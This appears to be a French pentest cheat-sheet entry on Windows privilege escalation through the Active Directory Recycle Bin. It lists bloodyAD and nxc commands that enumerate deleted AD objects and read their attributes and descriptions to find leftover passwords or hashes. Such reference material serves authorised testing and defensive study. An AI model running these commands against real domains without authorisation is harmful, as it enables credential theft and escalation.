Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'AD Recycle Bin'Description: Confirmer l'appartenance au groupe AD Recycle Bin : accès aux objets supprimés.
Windows Privilege Escalation
Explorer les objets AD supprimés pour retrouver des credentials ou attributs sensibles résiduels.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'AD Recycle Bin'Description: Confirmer l'appartenance au groupe AD Recycle Bin : accès aux objets supprimés.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(isDeleted=TRUE)' --attr sAMAccountName,description --include-deletedDescription: Lister les objets supprimés : comptes désactivés ou supprimés avec des credentials résiduels.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object 'CN=$USER\0ADEL:$GUID,CN=Deleted Objects,$BASEDN' --attr * --include-deletedDescription: Lire tous les attributs d'un objet supprimé : trouver des mots de passe ou hashes résiduels.
nxc ldap $DC -u $USER -p $PASS -M get-desc-usersDescription: Chercher des mots de passe dans les descriptions des comptes supprimés.